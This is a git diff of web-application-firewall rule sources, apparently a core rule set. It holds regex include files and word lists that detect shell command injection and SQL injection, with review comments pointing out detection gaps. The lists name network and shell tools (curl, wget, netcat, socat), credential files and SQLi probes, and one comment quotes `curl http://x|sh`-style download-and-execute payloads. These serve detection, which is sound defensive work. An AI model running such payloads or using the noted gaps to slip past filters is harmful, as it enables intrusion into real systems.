index 0000000000..a1d77375c5
--- /dev/null
+++ b/regex-assembly/exclude/windows-commands-fps.ra
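Review bot: This file removes `curl`, `wget`, `python`, `links`, `snap` and `cpan` from the command-word list used by the User-Agent/Referer RCE rules, and the first three are also the most common download-and-execute stages of a real injected payload (`curl http://x|sh`, `wget -O- …|sh`, `python -c …`), so after this change such a payload in those headers is caught only through the other command words or shell syntax around those tokens. That trade-off is reasonable for a UA that is literally `curl/8.1.2`, but it should be written down where the next person adds an entry, e.g. `##! NOTE: excluding a word here means an RCE payload in UA/Referer is no longer detected by that word alone; keep this list to tools that send their own name as the UA and document the matching UA string for each entry.` The per-entry `# tool (url): example-UA` comments already do the second half of that — worth keeping as a hard requirement.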
@@ -0,0 +1,89 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list excludes command words that are prone to cause false
+##! because they're common English words.
+##!
+##! This list can be generated with:
+##! util/fp-finder/spell.sh -m regex-assembly/include/windows-commands.ra
+
+active
+add
+append
+arp
+assign
+at
+attributes
+break
+call
+cd
+change
+choice
+cipher
+clean
+clip
+cls
+color
+comp
+compact
+convert
+copy
+create
+date
+delete
+detail
+echo
+edit
+erase
+exec
+exit
+expand
+expose
+extend
+extract
+find
+finger
+fondue
+format
+ftp
+help
+inactive
+label
+list
+md
+mode
+more
+mount
+move
+msg
+online
+path
+pause
+ping
+print
+prompt
+query
+recover
+rem
+remove
+rename
+repair
+replace
+reset
+retain
+revert
+select
+shadow
+shift
+shrink
+shutdown
+sort
+start
+time
+title
+tree
+type
+ver
+verifier
+verify
+writer
diff --git a/regex-assembly/include/932130.ra b/regex-assembly/include/932130.ra
new file mode 100644
index 0000000000..b5ac4977f6
--- /dev/null
+++ b/regex-assembly/include/932130.ra
@@ -0,0 +1,13 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+\$\(.*\)
+\$\{.*\}
+<\(.*\)
+>\(.*\)
+\$\(\(.*\)\)
+
+##! Find wordlist bypasses using [ ] glob characters, like: /e[t]c
+##! Require a / in front to prevent false positives like [text in brackets]
+/\w*\[!.+\]
+/\w*\[.+\]
diff --git a/regex-assembly/include/allowed-charsets.ra b/regex-assembly/include/allowed-charsets.ra
new file mode 100644
index 0000000000..bf902f0f1d
--- /dev/null
+++ b/regex-assembly/include/allowed-charsets.ra
@@ -0,0 +1,9 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list is in sync with the default value of tx.allowed_request_content_type_charset.
+
+iso-8859-1
+iso-8859-15
+utf-8
+windows-1252
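Review bot: The header sentence of windows-commands-fps.ra is missing a word — `prone to cause false because they're common English words` should read `##! positives because they're common English words.` on its second line. Each word listed here is also a detection gap for `cmd /c` / PowerShell payloads built from `echo`, `exec`, `find`, `ping`, `type`, `shutdown` and friends; since the file says it is generated by `spell.sh`, a short note on which of these were checked for attack usage before being accepted (or a pointer to the rule/PL that still catches them, if one exists) would let a reviewer judge the trade-off rather than trust the generator.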
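Review bot: In 932130.ra the last two lines overlap: `/\w*\[.+\]` already matches every string `/\w*\[!.+\]` matches, because `!` is just one of the characters `.+` accepts, so the negated-glob line adds nothing and can be deleted (or the pair written once as `/\w*\[!?.+\]` if the intent is to document both forms). `.+` inside the brackets is also unbounded and will run past the closing `]` to the end of the input; `/\w*\[[^\]]+\]` keeps the match inside one bracket expression, still catches `/e[t]c` and `/us[r]/bin`, and trims backtracking on long parameters.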
diff --git a/regex-assembly/include/charset-specification-no-anchors.ra b/regex-assembly/include/charset-specification-no-anchors.ra
new file mode 100644
index 0000000000..2cad0b73a1
--- /dev/null
+++ b/regex-assembly/include/charset-specification-no-anchors.ra
@@ -0,0 +1,112 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The expression generated from this file matches a full HTTP +##! `Accept` header by following the specification as far as +##! necessary, while restricting the `charset` parameter +##! to a list of explicitly allowed values. +##! Where possible, the expression matches tokens "loosely", +##! to reduce complexity and the risk of false positives. + +##! As this specification is used by several rules, we now +##! store it as an include file. + +##! Specifications: +##! https://httpwg.org/specs/rfc7231.html#request.conneg +##! https://httpwg.org/specs/rfc7230.html + +##! Helpers +##!> define non-token-without-dquote-chars (),/:;<=>?![\x5c\]{} + +##!> define non-token-chars \"{{non-token-without-dquote-chars}} + +##!> define token-chars [^{{non-token-chars}}] + +##!> define token-with-dquote-chars [^{{non-token-without-dquote-chars}}] + +##!> define type-subtype (?:\*|{{token-chars}}+) + +##! The specification does not allow `*` in place of `*/*` but +##! enough clients use `*` for it to be an issue. Thus, it is +##! explicitly allowed here. +##!> define media-type (?:(?:{{type-subtype}}/{{type-subtype}})|\*) + +##! list of allowed charsets +##!> assemble + (?:"? + ##!=> + ##!> include allowed-charsets + ##!=> + \b"?)) + ##!=< allowed-charsets +##!< + + +##! Main assembly +##!> assemble + (?:{{media-type}}) + ##!=> + (?:\s*;\s* + ##!=> + (?:(?:charset\s*=\s* + ##!=> + ##!=> allowed-charsets + + ##! If the first part wasn't a "charset", then + ##! anything is allowed here that is not "charset". + ##! Note that this doesn't follow the RFC strictly. + |(?: + ##!=> + ##! Do not match space, otherwise the following would be possible: + ##! "text/html; charset=invalid" + ##! 
`charset` would be matched by `{{token-chars}}` + [^c\s{{non-token-chars}}]{{token-chars}}* + c[^h{{non-token-chars}}]{{token-chars}}* + ch[^a{{non-token-chars}}]{{token-chars}}* + cha[^r{{non-token-chars}}]{{token-chars}}* + char[^s{{non-token-chars}}]{{token-chars}}* + chars[^e{{non-token-chars}}]{{token-chars}}* + charse[^t{{non-token-chars}}]{{token-chars}}* + ##!=> + )\s*=\s*{{token-with-dquote-chars}}+) + ##!=> + ##! Clients like to violate the RFC, be lenient with + ##! terminating semi-colons. + ;? + ##!=> + )* + ##!=> + + ##! Multiple "media-range" expressions can be + ##! specified, comma separated. + (?:\s*,\s* + ##!=> + (?:{{media-type}}) + ##!=> + (?:\s*;\s* + ##!=> + (?:(?:charset\s*=\s* + ##!=> + ##!=> allowed-charsets + |(?: + ##!=> + ##! Do not match space, otherwise the following would be possible: + ##! "text/html; charset=invalid" + ##! `charset` would be matched by `{{token-chars}}` + [^c\s{{non-token-chars}}]{{token-chars}}* + c[^h{{non-token-chars}}]{{token-chars}}* + ch[^a{{non-token-chars}}]{{token-chars}}* + cha[^r{{non-token-chars}}]{{token-chars}}* + char[^s{{non-token-chars}}]{{token-chars}}* + chars[^e{{non-token-chars}}]{{token-chars}}* + charse[^t{{non-token-chars}}]{{token-chars}}* + ##!=> + )\s*=\s*{{token-with-dquote-chars}}+) + ##!=> + ##! Clients like to violate the RFC, be lenient with + ##! terminating semi-colons. + ;? + ##!=> + )*)* + ##!=> +##!< diff --git a/regex-assembly/include/charset-specification.ra b/regex-assembly/include/charset-specification.ra new file mode 100644 index 0000000000..24f2127d49 --- /dev/null +++ b/regex-assembly/include/charset-specification.ra 
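Review bot: The `charset`-exclusion lattice and the parameter group around it are written out twice in charset-specification-no-anchors.ra — once for the first media-range and again inside the comma-separated repetition — so any future fix has to be applied in two places and the copies can silently drift. The file already uses the store/recall mechanism for `allowed-charsets` (`##!=< allowed-charsets` / `##!=> allowed-charsets`); the whole `(?:\s*;\s* … ;?)*` parameters group can be assembled once the same way and recalled in both positions. One behaviour worth a comment: a parameter whose name merely starts with `charset` (e.g. `charsetx=foo`) is rejected by every branch of the lattice and therefore fails the whole header, which is presumably deliberate but not obvious from the lattice itself. This hunk begins in the preceding line (`@@ -0,0 +1,112 @@`).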
@@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The expression generated from this file matches a full HTTP +##! `Accept` header by following the specification as far as +##! necessary, while restricting the `charset` parameter +##! to a list of explicitly allowed values. +##! Where possible, the expression matches tokens "loosely", +##! to reduce complexity and the risk of false positives. + +##! As this specification is used by several rules, we now +##! store it as an include file. + +##! Specifications: +##! https://httpwg.org/specs/rfc7231.html#request.conneg +##! https://httpwg.org/specs/rfc7230.html + +##!^ ^ +##!$ $ + +##!> include charset-specification-no-anchors diff --git a/regex-assembly/include/js-truthy-values.ra b/regex-assembly/include/js-truthy-values.ra new file mode 100644 index 0000000000..5e229bb9aa --- /dev/null +++ b/regex-assembly/include/js-truthy-values.ra @@ -0,0 +1,49 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Falsy and negations +##!> assemble + !+ + ##!=> + false + null + undefined + NaN + [-+]?0 + "{2} + '{2} + `{2} +##!< + +##! Truthy and double negations (word boundary) +##!> assemble + (?:!!)* + ##!=> + true + [-+]?Infinity + [-+]?[1-9]\d* + new [a-zA-Z]\w* + this + window + String + Boolean + Object + Array + Function + ##!=> + \b + ##!=> +##!< + + +##! Truthy and double negations (no word boundary: anything that ends +##! with a special character) +##!> assemble + (?:!!)* + ##!=> + \{.*\} + \[.*\] + "[^"]+" + '[^']+' + `[^`]+` +##!< diff --git a/util/regexp-assemble/regexp-942150.data b/regex-assembly/include/sql-injection-function-names.ra similarity index 52% rename from util/regexp-assemble/regexp-942150.data rename to regex-assembly/include/sql-injection-function-names.ra index 66f1ed8201..91b47bf80d 100644 --- a/util/regexp-assemble/regexp-942150.data 
+++ b/regex-assembly/include/sql-injection-function-names.ra @@ -1,5 +1,9 @@ -abs -acos +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ \b +##!$ \W*\( + adddate addtime aes_decrypt @@ -9,57 +13,49 @@ asciistr asin atan atan2 -avg benchmark -bin bin_to_num bit_and bit_count bit_length bit_or bit_xor -cast -ciel -cieling char_length -char character_length -charset -chr +ciel +cieling coalesce coercibility collation compress -concat_ws concat +concat_ws connection_id conv -convert_tz convert +convert_tz cos cot -count -dcount cr32 curdate current_date +current_setting current_time current_timestamp current_user curtime database -date +database_to_xml date_add date_format date_sub datediff -day dayname dayofmonth dayofweek dayofyear +dcount decode -default degrees des_decrypt des_encrypt @@ -67,30 +63,28 @@ dump elt encode encrypt +endswith +ends_with exp export_set extract extractvalue -field field_in_set find_in_set -floor -format found_rows from_base64 from_days from_unixtime +geometrycollection get_format get_lock +getpgusername greatest group_concat +gtid_subset hex hextoraw -rawtohex -hour -if ifnull -in inet6_aton inet6_ntoa inet_aton 
@@ -98,139 +92,194 @@ inet_ntoa insert instr interval -isnull is_free_lock +is_ipv4 is_ipv4_compat is_ipv4_mapped -is_ipv4 is_ipv6 -is_not_null is_not +is_not_null is_null +is_superuser is_used_lock -last +isnull +json +json_agg +json_array +json_array_elements +json_array_elements_text +json_array_length +json_build_array +json_build_object +json_each +json_each_text +json_extract_path +json_extract_path_text +json_object +json_object_agg +json_object_keys +json_populate_record +json_populate_recordset +json_strip_nulls +json_to_record +json_to_recordset +json_typeof +jsonb +jsonb_array +jsonb_array_elements +jsonb_array_elements_text +jsonb_array_length +jsonb_build_array +jsonb_build_object +jsonb_object +jsonb_each +jsonb_each_text +jsonb_extract_path +jsonb_extract_path_text +jsonb_insert +jsonb_object +jsonb_object_agg +jsonb_object_keys +jsonb_path_exists +jsonb_path_exists_tz +jsonb_path_match +jsonb_path_match_tz +jsonb_path_query +jsonb_path_query_array +jsonb_path_query_array_tz +jsonb_path_query_first +jsonb_path_query_first_tz +jsonb_path_query_tz +jsonb_populate_record +jsonb_populate_recordset +jsonb_pretty +jsonb_set +jsonb_set_lax +jsonb_strip_nulls +jsonb_to_record +jsonb_to_recordset +jsonb_typeof +jsonpath last_day last_inser_id lcase least left -length -ln +likelihood +likely +linestring +lo_from_bytea +lo_put load_file -local localtimestamp locate -log -log2 log10 +log2 lower lpad ltrim make_set makedate master_pos_wait -max md5 microsecond mid -min -minute -mod -month monthname +multilinestring +multipoint +multipolygon name_const not_in -now nullif oct octet_length old_password ord -password period_add period_diff -pi +pg_client_encoding +pg_database +pg_largeobject +pg_ls_dir +pg_read_file +pg_sleep +pg_user +polygon position pow -power procedure_analyse quarter +query_to_xml quote radians rand +rawtohex release_lock -repeat -replace -reverse -right -round row_count +row_to_json rpad rtrim schema sec_to_time -second session_user sha sha1 
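Review bot: `ciel` and `cieling` are re-added in their new alphabetical position unchanged, but MySQL's functions are `ceil` and `ceiling`; with the new `\b…\W*\(` anchors `\bciel\W*\(` can never match a real query while `ceiling(` goes undetected, so the spelling should be fixed while the lines are being moved (unless some dialect really has `ciel`, which I am not aware of). `cr32` in the context lines looks like the same kind of typo for `crc32`. The removal of `avg`, `cast`, `count`, `date`, `day`, `default`, `floor`, `format`, `hour`, `if`, `in` and the other common words is clearly the false-positive clean-up the anchors enable, but the header should say so, e.g. `##! Common English words (cast, count, date, if, in, …) are intentionally absent from this list.` — and if another 942 rule still covers them, name it; otherwise state the accepted gap.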
sha2 -sign sin -pg_sleep -sleep soundex space +sqlite_compileoption_get +sqlite_compileoption_used +sqlite_source_id sqrt +startswith +starts_with std stddev_pop stddev_samp str_to_date strcmp subdate +substr substring substring_index -substr subtime -sum sysdate system_user -tan -time +time_format +time_to_sec +timediff timestamp timestampadd timestampdiff -timediff -time_format -time_to_sec to_base64 -todays -toseconds +to_json +to_jsonb tochar +todays tonchar +toseconds trim truncate ucase uncompress uncompressed_length unhex +unistr unix_timestamp +unlikely updatexml -upper -user +use_json_null utc_date utc_time utc_timestamp uuid uuid_short -values var_pop var_samp variance -version -week weekday weekofyear weight_string -year -yearweek xmltype +yearweek diff --git a/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra b/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra new file mode 100644 index 0000000000..a58f2c4279 --- /dev/null +++ b/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra @@ -0,0 +1,23 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +create\s+function\s*?\w+\s*?\(\s*?\)\s*?- +create\s+procedure\s*?\w+\s*?\(\s*?\)\s*?- +declare[^\w]+[@#]\s*?\w+ +div\s*?\([+-]*[\d.\s]+,[+-]*[\d.\s]+\) +exec\s*?\(\s*?@ +lo_import\s*?\( +lo_get\s*?\( +procedure\s+analyse\s*?\( +;\s*?declare\s+[\w-]+ +;\s*?open\s+[\w-]+ +::bigint +::bool +::double\s+precision +::int +::integer +::numeric +::oid +::real +::text +::smallint diff --git a/regex-assembly/include/unix-shell-4andup.ra b/regex-assembly/include/unix-shell-4andup.ra new file mode 100644 index 0000000000..6b82382792 --- /dev/null +++ b/regex-assembly/include/unix-shell-4andup.ra 
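Review bot: `sleep` is removed in this hunk and not re-added anywhere in the new list (only `pg_sleep` reappears), so MySQL's `sleep(5)` — the standard time-based blind SQLi probe — no longer matches this function-name list; unless `sleep\W*\(` is caught by another 942 rule, that is a detection regression that deserves either a revert of that one line or an explicit comment. `version` and `user` are dropped for the same false-positive reasons and are likewise classic fingerprinting probes (`version()`, `user()`), so the same question applies to them. `jsonb_object` is added twice (after `jsonb_build_object` and again after `jsonb_each_text`); the assembler will merge them, but the duplicate should go. `last_inser_id` in the context lines (pre-existing) looks like a typo for MySQL's `last_insert_id`.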
@@ -0,0 +1,576 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list was generated from the original lists with the following command: +##! awk '/^([a-z0-9_-]+)/ { x = $0; gsub(/[@~]/, "", x); if (length(x) > 3) print }' 93210{0,5}.data + +##! Note that the suffixes must be added manually to new entries. +##! To regenerate this list from unix-shell.data, run the following: +##! NL=$'\n' +##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-4andup.ra)" +##! source="$(awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) > 3 {print y}' \ +##! rules/unix-shell.data | \ +##! sort | uniq)" +##! result="" +##! # retain all unmodified entries in this list and skip removed ones; ignore the manually added suffixes +##! while read -r oword; do +##! # strip suffixes from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%~/}" +##! while read -r sword; do +##! # handle "clang++" +##! sword="${sword//++/\+\+}" +##! # handle "." in commands +##! sword="${sword//./\.}" +##! if [ "${oword_raw}" = "${sword}" ]; then +##! result="${result}${oword}${NL}" +##! break +##! fi +##! done <<<"${source}" +##! done <<<"${original}" + +##! # add new entries to this list +##! while read -r sword; do +##! # handle "clang++" +##! sword="${sword/%++/\+\+}" +##! # handle "." in commands +##! sword="${sword//./\.}" +##! found=0 +##! while read -r oword; do +##! # strip suffixes from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%~/}" +##! if [ "${oword_raw}" = "${sword}" ]; then +##! found=1 +##! break +##! fi +##! done <<<"${original}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${sword}${NL}" +##! fi +##! done <<<"${source}" + +##! # check entries for English words and suffix those +##! original="${result}" +##! english="$(util/fp-finder/spell.sh -m -e - <<<"${result}")" +##! result="" +##! while read -r oword; do +##! found=0 +##! 
while read -r eword; do +##! if [ "${oword}" = "${eword}" ] && [ -n "${oword}" ]; then +##! result="${result}${oword}@${NL}" +##! found=1 +##! break +##! fi +##! done <<<"${english}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${oword}${NL}" +##! fi +##! done <<<"${original}" + +##! body_start=$(grep -n -E -m 1 '^[^#$]' regex-assembly/include/unix-shell-4andup.ra | cut -d: -f1) +##! ed -s regex-assembly/include/unix-shell-4andup.ra <> regex-assembly/include/unix-shell-4andup.ra + +HEAD@ +POST@ +addgroup +adduser +agetty +alias@ +alpine@ +ansible-playbook +apt-get +aptitude@ +arch@ +aria2c +ascii-xfr +ascii85 +aspell +atobm +axel@ +base32 +base64 +basename@ +basenc +bash@ +batch@ +blkid +bpftrace +breaksw +bridge@ +bsdcat +bsdiff +bsdtar +builtin +bundler@ +bunzip2 +busctl +busybox +byebug +byobu +bzcat +bzcmp +bzdiff +bzegrep +bzexe +bzfgrep +bzgrep +bzip2 +bzip2recover +bzless +bzmore +cancel@ +capsh@ +certbot +chattr +chdir@ +check_by_ssh +check_cups +check_log +check_memory +check_raid +check_ssl_cert +check_statusfile +chflags +chgpasswd +chgrp +chmod +choom +chown +chpass +chroot@ +chsh +clang@ +clang\+\+ +cobc +column@ +comm@ +command@ +composer@ +compress@ +coproc +cowsay +cowthink +cpan +cpio +cpulimit +crash@ +cron +crontab +csplit +csvtool +cupsfilter +curl@ +dash@ +date@ +dhclient +dialog@ +diff@ +dmesg +dmidecode +dmsetup +doas +docker@ +done@ +dosbox +dpkg +dvips +e2fsck +easy_install +echo@ +efax +egrep +emacs +endif +endsw +env-update +esac +eval +exec@ +exiftool +expand@ +expect@ +export@ +expr +facter +fetch@ +fgrep +file@ +filetest +find@ +finger@ +fish@ +flock@ +fold@ +foreach +fping +ftpstats +ftpwho +function@ +gawk@ +gcore +genie@ +genisoimage +getfacl@ +ghci +gimp@ +ginsh +grep@ +group@ +groupmod +gtester +gunzip +gzcat +gzexe +gzip +hash@ +head@ +hexdump +highlight@ +history@ +hostid +hostname +hping3 +htdigest +htop +htpasswd +iconv +ifconfig +iftop +install@ +ionice +ip6tables +ipconfig +iptables +ispell +java@ +jexec +jobs@ 
+join@ +journalctl +jrunscript +kill@ +killall +knife@ +ksshell +last@ +lastcomm +lastlog +lastlogin +latex@ +ldconfig +less@ +lessecho +lessfile +lesspipe +lftp +lftpget +links@ +local@ +locate@ +loginctl +logname +logsave +look@ +losetup +ls-F +lsb_release +lscpu +lshw +lsmod +lsof +lspci +lsusb +ltrace +lualatex +luatex +lwp-download +lwp-dump +lwp-mirror +lwp-request +lynx@ +lz4c +lz4cat +lzcat +lzcmp +lzdiff +lzegrep +lzfgrep +lzgrep +lzless +lzma +lzmadec +lzmainfo +lzmore +mail@ +mailq +mailx@ +make@ +master\.passwd +mawk +mkdir@ +mkfifo +mknod +mktemp +mlocate +more@ +mosquitto +mount@ +msgattrib +msgcat +msgconv +msgfilter +msgmerge +msguniq +mutt@ +mysql +mysqladmin +mysqldump +mysqldumpslow +mysqlhotcopy +mysqlshow +nano@ +nasm +nawk +nc\.openbsd +nc\.traditional +ncat +neofetch +netcat +netkit-ftp +netplan +netstat +nice@ +nmap +node@ +nohup +nping +nroff +nsenter +nslookup +nstat +null@ +octave@ +onintr +openssl +openvpn +openvt +opkg +pacman@ +parted@ +passwd +paste@ +patch@ +pdflatex +pdftex +pdksh +perf@ +perl@ +perl5 +perlsh +perms@ +pftp +pgrep +php-cgi +php5 +php7 +pico@ +pidstat +pigz +ping@ +pkexec +pkg_info +pkginfo +pkill +popd +printenv +printf@ +psed +psftp +psql +ptar +ptardiff +ptargrep +puppet@ +pushd +pwd\.db +python2 +python3 +python~ +pyversions +py3versions +rake@ +raku +rbash +readelf +realpath +redcarpet@ +rename@ +repeat@ +replace@ +restic +rlogin +rlwrap +rmdir@ +rmuser +rnano +route@ +rpmdb +rpmquery +rpmverify +rsync +ruby~ +run-mailcap +run-parts +rview +rvim +sash@ +sched +screen@ +script@ +sdiff +self@ +sendmail +service@ +setarch +setenv +setfacl@ +setsid +sftp +sh\.distrib +shadow@ +shells@ +shuf +shutdown@ +sleep@ +slsh +smbclient +snap@ +socat +soelim +sort@ +source@ +split@ +spwd\.db +sqlite3 +ssh-keygen +ssh-keyscan +sshpass +start-stop-daemon +stdbuf +stderr +stdin +stdout +strace +strings@ +sudo +sysctl +systemctl +systemd-resolve +tail@ +tailf +task@ +taskset +tclsh +tcpdump +tcping +tcptraceroute +tcsh +telnet 
+tftp +time@ +timedatectl +timeout@ +tmux +touch@ +traceroute +traceroute6 +troff +tshark +ulimit@ +uname +uncompress@ +unexpand +uniq +unlink@ +unlz4 +unlzma +unpigz +unrar +unset@ +unshare@ +unxz +unzip@ +unzstd +up2date@ +update-alternatives +useradd +userdel +usermod +uudecode +uuencode +valgrind +view@ +vigr +vimdiff +vipw +virsh +volatility@ +wall@ +watch@ +wget +whiptail@ +whoami +whois +wireshark +wish@ +xargs +xelatex +xetex +xmodmap +xmore +xpad +xterm +xzcat +xzcmp +xzdec +xzdiff +xzegrep +xzfgrep +xzgrep +xzless +xzmore +yarn@ +yelp@ +zathura +zcat +zcmp +zdiff +zegrep +zero@ +zfgrep +zgrep +zipcloak +zipcmp +zipdetails +zipgrep +zipinfo +zipmerge +zipnote +zipsplit +ziptool +zless +zmore +zrun +zsoelim +zstd +zstdcat +zstdgrep +zstdless +zstdmt +zypper diff --git a/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra b/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra new file mode 100644 index 0000000000..dc951a296d --- /dev/null +++ b/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra @@ -0,0 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! ifconfig (start of string) +^ +##!> include unix-shell-evasion-prefix.ra diff --git a/regex-assembly/include/unix-shell-evasion-prefix.ra b/regex-assembly/include/unix-shell-evasion-prefix.ra new file mode 100644 index 0000000000..8965c80a66 --- /dev/null +++ b/regex-assembly/include/unix-shell-evasion-prefix.ra 
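Review bot: The regeneration script in the header strips the `~` suffix with `oword_raw="${oword_raw/%~/}"` (unescaped), whereas the sibling unix-shell-upto3.ra writes `"${oword_raw/%\~/}"`; bash applies tilde expansion to the pattern of `${var/pattern/}`, so the unescaped form most likely looks for `$HOME` instead of a literal `~`, and on regeneration the `python~` and `ruby~` entries would fail to match their raw words and lose their suffix. The two loops also disagree on how `++` is handled: the first uses `sword="${sword//++/\+\+}"` (all occurrences) and the second `sword="${sword/%++/\+\+}"` (trailing only) — pick one. The `ed -s regex-assembly/include/unix-shell-4andup.ra <> regex-assembly/...` line reads as truncated in this rendering (the here-document and the final append appear to be missing); worth checking that the committed comment still contains the full command.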
@@ -0,0 +1,98 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This assembly file generates a prefix match for unix shell RCE +##! evasions. Command words, in this case, must folow the prefix. +##! Separate rules target commands that do not follow this prefix, +##! as the chance of false positives is higher without a prefix match. + +##! ifconfig +##!> cmdline unix + busybox + command + env + eval + ltrace + nohup + strace + time + timeout + watch +##!< +##! ;ifconfig +; +##! =ifconfig += +##! {ifconfig} +\{ +##! |ifconfig +\| +##! ||ifconfig +\|\| +##! &ifconfig +& +##! & &ifconfig +&& +##! ;\nifconfig +\n +##! ;\rifconfig +\r +##! $(ifconfig) +\$\( +##! $((ifconfig)) +\$\(\( +##! `ifconfig` +` +##! ${ifconfig} +\${ +##! <( ifconfig ) +<\( +##! >( ifconfig ) +>\( +##! a() ( ifconfig; ); a +\(\s*\) +##! `cat<< + +##! match possible white space between prefix expressions +\s* +##!=> + +##! commands prefix +##!> assemble + ##! { ifconfig } + \{ + ##! ( ifconfig ) + \s*\(\s* + ##! VARNAME=xyz ifconfig + \w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+ + ##! ! ifconfig + !\s* + ##! $ifconfig + \$ +##!< +##!=> + +* +##!=> + +##! match possible white space between prefix expressions +\s* +##!=> + +##! quoting prefix +##!> assemble + ##! 'ifconfig' + ' + ##! "ifconfig" + \" +##!< +##!=> + +* +##!=> + +##! paths prefix (+ evasion prevention suffix [\x5c'\"]*) +(?:[\?\*\[\]\(\)\-\|+\w'\"\./\x5c]+/)?[\x5c'\"]* +##!=> diff --git a/regex-assembly/include/unix-shell-pl3.ra b/regex-assembly/include/unix-shell-pl3.ra new file mode 100644 index 0000000000..c17b751542 --- /dev/null +++ b/regex-assembly/include/unix-shell-pl3.ra 
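Review bot: The `VARNAME=xyz ifconfig` prefix lists `\$.*` twice in `\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+`, so one alternative is dead; drop the duplicate, or if one of them was meant to be a different form, restore it. `[^\s]*` is more readably written `\S*`. The header comment has a typo: `must folow the prefix` → `must follow the prefix`.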
@@ -0,0 +1,27 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list contains terms that are only searched for at PL 3.
+##! Note that the equivalent could be achieved by using
+##! `include` processors with both <= 3 and > 3 but that would
+##! make the rule almost identical to its PL 1 counterparts,
+##! artificially doubling the critiality of hits and adding
+##! unnecessary overhead.
+
+##! Note that this list is arbitrary. We do not have criteria
+##! for inclusion in this list apart from false positive
+##! reports.
+
+##! This list must be in sync with:
+##! - unix-shell-upto3.ra
+##! - unix-shell-4andup.ra
+##! - unix-shell-pl3.ra
+
+aptitude@
+dnf
+pacman@
+ps
+up2date@
+vi@
+who
+w@
diff --git a/regex-assembly/include/unix-shell-upto3.ra b/regex-assembly/include/unix-shell-upto3.ra
new file mode 100644
index 0000000000..874e5983f1
--- /dev/null
+++ b/regex-assembly/include/unix-shell-upto3.ra
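Review bot: The "must be in sync with" list names unix-shell-pl3.ra, i.e. this file itself; replace the self-reference with the file that actually has to stay aligned (or drop it). The entries `ps` and `who` carry no `@` suffix here while unix-shell-upto3.ra in the same commit lists them as `ps@` and `who@`; if "in sync" includes the manually added suffixes, these two differ. Typo in the header: `critiality` → `criticality`.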
@@ -0,0 +1,198 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Note that the suffixes @ / ~ must be added manually to new entries. +##! To regenerate this list from unix-shell.data, run the following: +##! NL=$'\n' +##! # select words of length <= 3 +##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" +##! source=$(awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) <= 3 {print y}' \ +##! rules/unix-shell.data | \ +##! sort | uniq) +##! result="" +##! # retain all unmodified entries in this list and skip removed ones; ignore the manually added suffixes +##! while read -r oword; do +##! # strip @ and ~ from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%\~/}" +##! while read -r sword; do +##! if [ "${oword_raw}" = "${sword}" ]; then +##! result="${result}${oword}${NL}" +##! break +##! fi +##! done <<<"${source}" +##! done <<<"${original}" + +##! # add new entries to this list +##! while read -r sword; do +##! found=0 +##! while read -r oword; do +##! # strip @ and ~ from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%\~/}" +##! if [ "${oword_raw}" = "${sword}" ]; then +##! found=1 +##! break +##! fi +##! done <<<"${original}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${sword}${NL}" +##! fi +##! done <<<"${source}" + +##! # check entries for English words and suffix those +##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" +##! english="$(util/fp-finder/spell.sh -m -e regex-assembly/include/unix-shell-upto3.ra)" +##! # do not suffix the following words: +##! english="$(grep -vE 'ip|id|top|set' <<< "${english}")" +##! result="" +##! while read -r oword; do +##! found=0 +##! while read -r eword; do +##! if [ "${oword}" = "${eword}" ] && [ -n "${oword}" ]; then +##! result="${result}${oword}@${NL}" +##! found=1 +##! break +##! fi +##! done <<<"${english}" +##! 
